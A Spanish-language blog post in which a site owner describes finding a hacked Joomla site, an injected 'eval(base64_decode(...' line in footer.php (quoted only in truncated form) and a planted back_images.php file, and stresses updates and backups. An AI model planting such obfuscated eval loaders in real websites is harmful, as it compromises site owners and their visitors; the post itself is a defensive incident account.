Hoy cuando ha amanecido, he accedido a Google Analytics y me ha resultado extraño no tener ninguna visita en mi página web desarrollada en Joomla, además solo cargaba la cabecera y el pie de página, junto con algunos css. No era el aspecto más deseable para acceder a mi web. Tras revisar todos los archivos no daba crédito, todo parecía normal y no funcionaba correctamente. Sin embargo en la carpeta includes, en el archivo footer.php, existía el siguiente código:
error_reporting(0);eval(base64_decode(‘JGxMOXdG
Una vulnerabilidad del código Joomla, que permite modificar varios archivos footer.php, dejando inutilizado el frontend y algunos de los archivos del administrator. Menos mal que tenía un backup, espero solucionarlo con la instalación de la última versión.
Esto me ha hecho pensar, que no hay que olvidar en actualizar a la última versión de Joomla siempre, se evitan cosas como estas, espero que no me hayan hecho más movidas en el servidor.
Edito este post hoy día 5/12/12 para indicar que he encontrado en la carpeta images un archivo llamado back_images.php, este archivo tiene unas inyecciones de código brutal.
Procedo a eliminarlo. Tras buscar en google este inicio de cadena he llegado a este post que me puede ayudar en sucesivas eliminaciones, me ha llamado la atención que al cambiar de servidor esta web, a un servidor linux, me ha vuelto a ocurrir las mismas inyecciones de código.
El post interesante encontrado es este:
http://crear-paginas-web.blogspot.com.es/2010/04/archivos-php-hackeados-con.html